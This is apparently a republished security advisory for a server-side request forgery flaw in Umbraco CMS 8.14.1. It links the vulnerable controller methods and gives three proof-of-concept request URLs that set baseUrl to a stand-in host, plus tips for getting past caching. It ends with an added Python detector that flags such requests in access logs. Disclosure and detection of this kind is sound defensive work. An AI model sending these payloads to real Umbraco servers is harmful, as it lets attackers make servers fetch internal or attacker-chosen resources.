Umbraco 8.14.1 Server-Side Request Forgery

2021.10.29
Credit: NgoAnhDuc
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affected: Umbraco CMS v8.14.1, Umbraco Cloud

Vulnerable code:

Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14

Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50

Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91

PoC:

/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE

/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=https://SSRF-HOST.EXAMPLE/

/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/

Notes:
- There is no "/" suffix in payload 1
- The "/" suffix is required in payloads 2 and 3
- The "section" parameter value must be changed for each attempt
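Detection logic run over constructed access-log lines, added here as an example and not part of the advisory: it flags requests to the three endpoints above whose baseUrl names a host outside ALLOWED_BASEURL_HOSTS, an assumed allowlist for this example rather than an Umbraco setting.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory, lower-cased: ASP.NET routes match case-insensitively.
SSRF_ENDPOINTS = {
    "/umbraco/backoffice/api/help/getcontexthelpforpage",
    "/umbraco/backoffice/umbracoapi/dashboard/getremotedashboardcontent",
    "/umbraco/backoffice/umbracoapi/dashboard/getremotedashboardcss",
}
# Assumed allowlist of legitimate help/dashboard hosts (an assumption for this example, not an Umbraco setting).
ALLOWED_BASEURL_HOSTS = {"our.umbraco.com"}
# Combined log format of a reverse proxy (nginx/Apache) in front of the site.
LOG_LINE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                      r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_target(target):
    """(endpoint, baseUrl) if target hits a vulnerable endpoint with an off-allowlist baseUrl, else None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if path not in SSRF_ENDPOINTS:
        return None
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() != "baseurl":
            continue
        for value in values:
            host = urlsplit(value).hostname
            # Empty, relative or non-allowlisted host: the server would fetch a caller-chosen URL.
            if host is None or host.lower() not in ALLOWED_BASEURL_HOSTS:
                return (path, value)
    return None

def scan_log(lines):
    """One finding per access-log line that is a baseUrl SSRF attempt."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        hit = classify_target(m.group("target")) if m else None
        if hit:
            findings.append({"client": m.group("client"), "time": m.group("time"),
                             "endpoint": hit[0], "base_url": hit[1], "status": m.group("status")})
    return findings

# Constructed sample lines: two attempts, one legitimate fetch, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2021:10:15:32 +0000] "GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Jul/2021:10:15:40 +0000] "GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://203.0.113.77/ HTTP/1.1" 200 77',
    '198.51.100.9 - - [05/Jul/2021:10:16:01 +0000] "GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=content&baseUrl=https://our.umbraco.com/ HTTP/1.1" 200 2048',
    '198.51.100.9 - - [05/Jul/2021:10:16:05 +0000] "GET /umbraco/ HTTP/1.1" 200 1024',
]
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged requests; the legitimate fetch from the allowlisted host and the unrelated request produce no finding.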


Copyright 2024, cxsecurity.com